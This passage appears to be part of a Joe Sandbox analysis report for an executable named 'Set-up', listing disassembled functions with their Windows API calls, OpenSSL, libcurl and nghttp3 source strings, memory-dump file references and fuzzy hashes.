                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00928BD7
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00928C2B
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00928E63
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 01b0f0ed74a19b394c754add869bcac2cf7de35f228560ebc2e285918c140d4e
                            • Instruction ID: cc6134d6fa4a8e6f34a56b3dfa07f23feb654a41cf2a45951e03ffa8a6f88879
                            • Opcode Fuzzy Hash: 01b0f0ed74a19b394c754add869bcac2cf7de35f228560ebc2e285918c140d4e
                            • Instruction Fuzzy Hash: 3AF1CFB1A02621CFDB18CF18E59475ABBE6FF94310F18C56DE8498B399DB34E844CB90
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0082C685
                              • Part of subcall function 008073F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0080CA95,00CEAB98,00000467,mprintf.c), ref: 0080741D
                              • Part of subcall function 008073F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00807445
                              • Part of subcall function 008073F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,0080CA95,00CEAB98,00000467,mprintf.c), ref: 00807486
                              • Part of subcall function 008073F0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 008074AA
                              • Part of subcall function 008073F0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 008074B2
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0082C6CF
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-0000000C,?,?), ref: 0082C719
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy$__acrt_iob_func_errnofflushstrlen
                            • String ID: vtls/vtls.c
                            • API String ID: 1294796744-169717415
                            • Opcode ID: d53b75b67edd3983a1852f718a86491cb5e5e84003eed9306470bc0289d1a16d
                            • Instruction ID: 292a7acf59d0797df19929342db07a271e10777d6db2d7637eaa838edec1a3d7
                            • Opcode Fuzzy Hash: d53b75b67edd3983a1852f718a86491cb5e5e84003eed9306470bc0289d1a16d
                            • Instruction Fuzzy Hash: EAA153B0B00702ABDB608F69EC46B26BBE4FF54744F044539E948DB682F771E894CB55
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000000), ref: 0098E9A3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: $BN_lshift$crypto/bn/bn_shift.c
                            • API String ID: 2221118986-2228461501
                            • Opcode ID: 18bb63a7ce366d6f369567564721ee4608a40b82176a64bcaf4184aeab1a49f9
                            • Instruction ID: 7cddf4ea74b9d8ed59773e19c2c55a8972480c2e440be5fd6d1bbca44c1f2429
                            • Opcode Fuzzy Hash: 18bb63a7ce366d6f369567564721ee4608a40b82176a64bcaf4184aeab1a49f9
                            • Instruction Fuzzy Hash: 9F710E35A083159BC714EF29C89062AF7E5AFDA710F048B2EFDA967391D771AC01CB81
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,009B05BF,00000000,00000000,input), ref: 00A04986
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,?), ref: 00A049D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpystrlen
                            • String ID: crypto/property/property_string.c$ossl_property_string
                            • API String ID: 3412268980-3682758481
                            • Opcode ID: 9e320179c6de06c1bcb5db7186326a8e30aca451e93652bf5a33bfd2aa5d7ba5
                            • Instruction ID: ed7803bc1d2db9412546b0c4a56bc667f6b3241c5d2a10964b2987ba5ea8f10e
                            • Opcode Fuzzy Hash: 9e320179c6de06c1bcb5db7186326a8e30aca451e93652bf5a33bfd2aa5d7ba5
                            • Instruction Fuzzy Hash: DC5107F6A442057BE7117BA4BD43F5BB6986F94344F044134FE48A6393FA61EE14C392
                            APIs
                            • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 009F662C
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcpystrlen$memcmp
                            • String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
                            • API String ID: 1653033214-3047229099
                            • Opcode ID: 3827b7a3f2305b593f3c65b0ac24b9d68b8546311376d6259eda8ca416344dfd
                            • Instruction ID: 2906bc6f746e4fdcd9654f96bcc4de53dd7e3dbe77dda1fe6b7ff25bc550eedf
                            • Opcode Fuzzy Hash: 3827b7a3f2305b593f3c65b0ac24b9d68b8546311376d6259eda8ca416344dfd
                            • Instruction Fuzzy Hash: EF4107A6A483097BE62036B02D87FBF314C4F91758F240A34FB19992C3F955DA1483A7
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 008C8769
                            • SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 008C87D1
                              • Part of subcall function 008C88B0: QueryPerformanceFrequency.KERNEL32(?), ref: 008C88C1
                              • Part of subcall function 008C88B0: QueryPerformanceCounter.KERNEL32(?), ref: 008C88CC
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
                            • String ID:
                            • API String ID: 3112449238-0
                            • Opcode ID: e1ad28ce58672a07d5df9485f6ae465214bf6b1afd566165932bf024c5e7566e
                            • Instruction ID: d21eb92bba6bed4af5f41f65eb1d72d1e6494fffbb6c712a2228d65412086df1
                            • Opcode Fuzzy Hash: e1ad28ce58672a07d5df9485f6ae465214bf6b1afd566165932bf024c5e7566e
                            • Instruction Fuzzy Hash: AE31E3B2B40216EFEB089A25DC85F6A7678FB90340F54453CF816D7691EF31ED1487A1
                            APIs
                            • GetLastError.KERNEL32(009B7CCC,?,00000000,009B7127,009B7CCC,00000000,009DCAB7,00801A70), ref: 009B60E3
                            • SetLastError.KERNEL32(00000000), ref: 009B61A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID: crypto/err/err.c$crypto/err/err_local.h
                            • API String ID: 1452528299-2963546075
                            • Opcode ID: d13886d4bfbc5d367520c08fdc9b37b257474fe55486f7fc8ce7c44a69891933
                            • Instruction ID: bff622c4d7eaa25b0431f55649bc0c1b4c922c15f1b7f68172551eb5f49cd61e
                            • Opcode Fuzzy Hash: d13886d4bfbc5d367520c08fdc9b37b257474fe55486f7fc8ce7c44a69891933
                            • Instruction Fuzzy Hash: 5B3109B56843027AFA211E2C7D4BBA57714BBC572DF044230FE24A82D7E7B9B828C591
                            APIs
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,00A2066D,?,?,?), ref: 00990AAD
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcpystrlen$memset
                            • String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
                            • API String ID: 2970985887-4138242688
                            • Opcode ID: 51ef9213bbb121cd9e2f2b1a5df02bb14de4e7bc77e6ea576d42a5d3d3d7458f
                            • Instruction ID: 163e4419202f991e2927a1ceb7ee4324318b1ed980988021bf128e80e8650930
                            • Opcode Fuzzy Hash: 51ef9213bbb121cd9e2f2b1a5df02bb14de4e7bc77e6ea576d42a5d3d3d7458f
                            • Instruction Fuzzy Hash: 87313971B45300AFDF10AF28DC86B2A7B9C9FC1B14F088528F9599E2D6E7A4DC0487B1
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,009771DD,00000000,?,?), ref: 009744AC
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 009744FF
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strlen$strcpy$memcpy
                            • String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
                            • API String ID: 1223016426-1431402185
                            • Opcode ID: 80f693e3cc125e925a9dccb85a8bf62cd53d3ccb82686dd678a9b5de2798e11f
                            • Instruction ID: e8ead7da7e6603c2214482402a288c1c3405ca10439b47f26272745692bb79c9
                            • Opcode Fuzzy Hash: 80f693e3cc125e925a9dccb85a8bf62cd53d3ccb82686dd678a9b5de2798e11f
                            • Instruction Fuzzy Hash: AB1108736442145BD7206E649C42B67B3DC9BD1724F158169FD1D9B2D3EB61DC00D2F2
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 008AC4E7
                            Strings
                            • (size_t)(p - pbuf->last) == len, xrefs: 008AC4E2
                            • nghttp3_qpack.c, xrefs: 008AC4DD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
                            • API String ID: 1222420520-3384106985
                            • Opcode ID: 1edbe931464641b84d7dd0918458d102f206e2603b6822f759fda0c690a20dae
                            • Instruction ID: c42bdb3fbb66615e916583ec274620083c6ee29d02b0b094d9e1d005b4738b0c
                            • Opcode Fuzzy Hash: 1edbe931464641b84d7dd0918458d102f206e2603b6822f759fda0c690a20dae
                            • Instruction Fuzzy Hash: 8681E571A093049FE7049E2CC89072AB7D2FB9A714F18867CF999CB7D2D635DC488786
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f3814d95afad6b936a2d5c551bd923942d76a2c6af3998982bb9c18806d57476
                            • Instruction ID: db593f051f2586f932aaf1b199f73767b075bedecdf1e9caa5763facf168f89f
                            • Opcode Fuzzy Hash: f3814d95afad6b936a2d5c551bd923942d76a2c6af3998982bb9c18806d57476
                            • Instruction Fuzzy Hash: B5D18CB2508305BFD700AF58DC81E6BBBA9EBC5354F49492CF98553362E631ED14CBA2
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,008AB434,?,?,00000000,00000000,?,?), ref: 008AC68A
                            Strings
                            • (size_t)(p - rbuf->last) == len, xrefs: 008AC685
                            • nghttp3_qpack.c, xrefs: 008AC680
                            Memory Dump Source
